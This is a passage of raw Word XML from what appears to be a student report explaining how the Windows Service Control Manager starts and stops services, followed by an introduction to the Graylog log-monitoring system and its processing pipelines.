        <w:t>SCM can start services automatically at system boot, or the service can be started manually by any service control program. However, if an</w:t>
      </w:r>
      <w:r w:rsidR="001B297E">
        <w:t xml:space="preserve"> auto-start service demand on a</w:t>
      </w:r>
      <w:r w:rsidR="00790F27">
        <w:t xml:space="preserve"> demand-start service, that demand-service is also started automatically. </w:t>
      </w:r>
      <w:r w:rsidR="001B297E">
        <w:t xml:space="preserve">The startup type can be set to “disable”, which tells SCM not to start the service at startup, the service also cannot be started by any mean as well. The dependencies between services are important that we should </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001B297E">
        <w:t>take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001B297E">
        <w:t xml:space="preserve"> at them before enabling or disabling a service. Neither an auto-start service nor a demand-start can be started if the servi</w:t>
      </w:r>
      <w:r w:rsidR="00C93DB6">
        <w:t xml:space="preserve">ce they depend on is disabled. Some services must not be disabled, otherwise, </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00C93DB6">
        <w:t xml:space="preserve"> will be fail</w:t>
      </w:r>
      <w:r w:rsidR="001541BB">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00C93DB6">
        <w:t xml:space="preserve"> to boot because the disabled service may be an essential service or a service that essential ones depend on. </w:t>
      </w:r>
      <w:r w:rsidR="0006024B">
        <w:t>When starting a service, SCM performs the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006024B" w:rsidRPr="002B7458" w:rsidRDefault="002B7458" w:rsidP="0006024B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7458">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retrieves the account information stored in the services database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B7458" w:rsidRDefault="002B7458" w:rsidP="002B7458">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>The user</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t xml:space="preserve">name and password of the service account are specified at the time the service is installed. SCM stores the user name in a REG_SZ </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t xml:space="preserve"> value named </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t>ObjectName</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t xml:space="preserve"> within the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t xml:space="preserve"> key of the individual service (HKEY_LOCAL_MACHINE\SYSTEM\Curr</w:t>
      </w:r>
      <w:r>
        <w:t>entControlSet\Services\&lt;service</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t>name&gt;). The password is in a secure portion of Local Security Authority (LSA)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70" w:rsidP="002B7458">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B7458" w:rsidRDefault="002B7458" w:rsidP="0006024B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7458">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Logs on the service account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70" w:rsidP="001C2E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any process that runs in </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be run under an authorization of a specific account. For starting a service, SCM query the account information of that service from the services databases and logs on to </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>. The account that SCM uses to log on a local computer must have the user right called “Log on as a service”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70" w:rsidP="001C2E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70" w:rsidP="0006024B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Creates the service in suspended state</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="00AF24DE" w:rsidP="001C2E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF24DE">
        <w:t>SCM starts new services in a suspended state, because the service is useful only after SCM adds the required security information to the new process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF24DE" w:rsidRPr="001C2E70" w:rsidRDefault="00AF24DE" w:rsidP="001C2E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70" w:rsidP="0006024B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Assigns the access token to the process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF24DE" w:rsidRPr="00AF24DE" w:rsidRDefault="00AF24DE" w:rsidP="00AF24DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When an account logs on to </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>, the operation system calls winlogon.exe for getting the username and password of that account. When the log process successful, winlogon.exe calls wininit.exe to generate an access token, and any process which runs under that account need that access token to verify themselves</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:id w:val="-762759373"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Mic03 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00C111F5">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:t>(10)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF24DE" w:rsidRDefault="00AF24DE" w:rsidP="00AF24DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B7458" w:rsidRDefault="001C2E70" w:rsidP="00407D41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Allow the process to ex</w:t>
      </w:r>
      <w:r w:rsidR="00AF24DE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6B58" w:rsidRDefault="00AF24DE" w:rsidP="00AF24DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>After SCM completes the logon procedure and assigns the access token, SCM can allow the service to run and perform its functions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007644D7" w:rsidRDefault="001B6B58" w:rsidP="007644D7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="007644D7" w:rsidRPr="007644D7">
        <w:lastRenderedPageBreak/>
        <w:t>When a service is running, it sends status notifications to the SCM process. SCM maintains this status information in the service record for each service.</w:t>
      </w:r>
      <w:r w:rsidR="007644D7">
        <w:t xml:space="preserve"> SCM follow this information so that it does not mistakenly send control requests that violate the current service’s state. The service status sent includes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007644D7" w:rsidRDefault="007644D7" w:rsidP="007644D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007644D7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Service Type:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A service type can be a device driver, a system driver or a </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> service, and can run its own process or share a process with other services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007644D7" w:rsidRDefault="007644D7" w:rsidP="007644D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007644D7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Current State:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Indicates the state of the service as starting, running, paused or not running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="007644D7" w:rsidP="007644D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007644D7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Acceptable control codes: </w:t>
      </w:r>
      <w:r w:rsidR="008668F2">
        <w:t>Control code that the service can accept and process in its handler function, according to the state.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="00E41963" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="008668F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> exit code: </w:t>
      </w:r>
      <w:r w:rsidR="008668F2">
        <w:t xml:space="preserve">If an error occurs when a service is starting or stopping, it uses this code to reports to the system. </w:t>
      </w:r>
      <w:r w:rsidR="008668F2" w:rsidRPr="008668F2">
        <w:t>To return an error code specific to the service, the service must set this value to ERROR_SERVICE_SPECIFIC_</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008668F2">
        <w:t>ERROR to indicate that additional information can be found in the service exit code. The service sets this value to NO_ERROR when it is running or stopping properly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Service exit code: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The service uses this code to report an error when it is starting or stopping. The value is ignored unless the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exit code is set to ERROR_SERVICE_SPECIFIC_ERROR.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Wait hint: </w:t>
      </w:r>
      <w:r w:rsidRPr="008668F2">
        <w:t>The service uses this code to report the estimated time, in milliseconds, required for a pending start, stop, pause, or continue operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000679BF" w:rsidRDefault="008668F2" w:rsidP="00430F22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Checkpoint: </w:t>
      </w:r>
      <w:r w:rsidRPr="008668F2">
        <w:t>The service uses this value to periodically report its progress during a lengthy start, stop, pause, or continue operation. For example, the Services tool uses this value to track the progress of the service during start and stop operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000679BF" w:rsidRDefault="000679BF" w:rsidP="000679BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF24DE" w:rsidRDefault="001B6B58" w:rsidP="00EA77C6">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When stopping a service, SCM performs the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6B58" w:rsidRPr="0079537F" w:rsidRDefault="001B6B58" w:rsidP="001B6B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079537F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SCM receives a stop request for a service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6B58" w:rsidRDefault="0079537F" w:rsidP="001B6B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>A service control program which wants to stop a service will send a SERVICE_CONTROL_STOP request to the service through SCM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51D11" w:rsidRDefault="00A51D11" w:rsidP="001B6B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6B58" w:rsidRPr="0079537F" w:rsidRDefault="001B6B58" w:rsidP="001B6B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079537F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SCM examines the service dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079537F" w:rsidRDefault="0079537F" w:rsidP="0079537F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If SCM finds any running service that are dependent on the service requested to be stopped, SCM will return an error code to the service control program. Before triggering the stop procedure, the service control program </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enumerate and stop all services that are dependent on the service requested. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51D11" w:rsidRDefault="00A51D11" w:rsidP="0079537F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B6B58" w:rsidRDefault="001B6B58" w:rsidP="001B6B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079537F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SCM forwards the stop request to the service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630EC7" w:rsidRPr="00630EC7" w:rsidRDefault="00630EC7" w:rsidP="00630EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>If SCM detects that no dependent active services, SCM instructs the specified service to stop by forwarding the stop code to the service. The service must now free its allocated resources and shut down.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51D11" w:rsidRDefault="00A51D11">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB1472" w:rsidRDefault="00FB1472" w:rsidP="00FB1472"/>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70">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095BB2" w:rsidRPr="00095BB2" w:rsidRDefault="00095BB2" w:rsidP="00095BB2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc484962992"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Graylog</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRDefault="00F17DB1" w:rsidP="00F17DB1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17DB1" w:rsidRDefault="00064EB7" w:rsidP="00F17DB1">
      <w:r>
        <w:t xml:space="preserve">Graylog is a Security Information and Event Management (SIEM) software. Developed in 2010 by Lennart Koopmann in his free time, nowadays Gray log has become one of the best opensource SIEM and Log Monitor that is used worldwide by enterprises and corporations around the world. </w:t>
      </w:r>
      <w:r w:rsidR="00AA7BD6">
        <w:t xml:space="preserve">Graylog’s first version was published in Mach, 2015 as an opensouce software that is supported by community and a purchased solution to support large enterprises and campuses. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA7BD6" w:rsidRDefault="00AA7BD6" w:rsidP="00AA7BD6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Graylog </w:t>
      </w:r>
      <w:r w:rsidR="00754DC7">
        <w:t>operations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B60E4" w:rsidRDefault="00754DC7" w:rsidP="00AA7BD6">
      <w:r>
        <w:t xml:space="preserve">Graylog has been developed to become a centralized log distributed system. Coding </w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java for working on linux operation system, </w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t>Graylog inherits from Unix all the best of this famous operation system. Working as a software that has abilities of flexibility, adaptability, high availability and its supporting community, Graylog can support large enterprises and campuses those has</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve">a large </w:t>
      </w:r>
      <w:r w:rsidR="009676F8">
        <w:t>number</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B60E4">
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve"> in a</w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t xml:space="preserve"> robust and trust</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t>ful way</w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t>. Grayl</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t>og operations can be listed as</w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t xml:space="preserve"> function</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t xml:space="preserve"> for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B60E4" w:rsidRPr="007E3DD2" w:rsidRDefault="008B60E4" w:rsidP="00AA7BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3DD2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Collecting, Preprocessing and Managing log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRDefault="008B60E4" w:rsidP="007E3DD2">
      <w:r>
        <w:t>Graylog</w:t>
      </w:r>
      <w:r w:rsidR="009676F8">
        <w:t xml:space="preserve"> is a log server that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provides many methods for collecting log information from variety sources, via its collector that has ability to be deployed in many different operation system environments. </w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve">Via its collectors, Graylog collects the operating information and event from its clients, then centralized manages that data, process it and manage it as well as alert on malfunction or malicious behaviors happened on its client systems. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA7BD6" w:rsidRDefault="0033002B" w:rsidP="007E3DD2">
      <w:r w:rsidRPr="00830CDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>For Processing the log data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve">Graylog provides an ability called “Pipelines”, which is an essential concept in Graylog’s operation </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1948390749"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="007E3DD2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007E3DD2">
            <w:instrText xml:space="preserve"> CITATION Gra \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="007E3DD2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="007E3DD2">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(15)</w:t>
          </w:r>
          <w:r w:rsidR="007E3DD2">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve">. Pipelines tie together the processing steps that Graylog applies to our data. </w:t>
      </w:r>
      <w:r w:rsidR="009676F8">
        <w:t xml:space="preserve">Containing rules and can connect to log streams from clients that send to its server, pipelines decides which process </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009676F8">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009676F8">
        <w:t xml:space="preserve"> be done on which kind of message. When working with a complicated message that a </w:t>
      </w:r>
      <w:r w:rsidR="00F216DD">
        <w:t>separately</w:t>
      </w:r>
      <w:r w:rsidR="009676F8">
        <w:t xml:space="preserve"> standing rule cannot be applied appropriately, </w:t>
      </w:r>
      <w:r w:rsidR="00F216DD">
        <w:t xml:space="preserve">pipelines implement a concept called “stages”. Stages are considered as groups of conditions those are the rules defined for pipelines. Stages that are similar in priority run at the same time across all connected pipelines, they decide </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F216DD">
        <w:t>whether or not</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F216DD">
        <w:t xml:space="preserve"> taking the next priority state. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRDefault="00F216DD" w:rsidP="008B23B2">
      <w:r w:rsidRPr="0033002B">
        <w:t>Structure of pipeline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is specified as a script that has many lines comprise of which defines the name of pipeline and those define the rules, the stages and their conditions.</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The structure can be explain</w:t>
      </w:r>
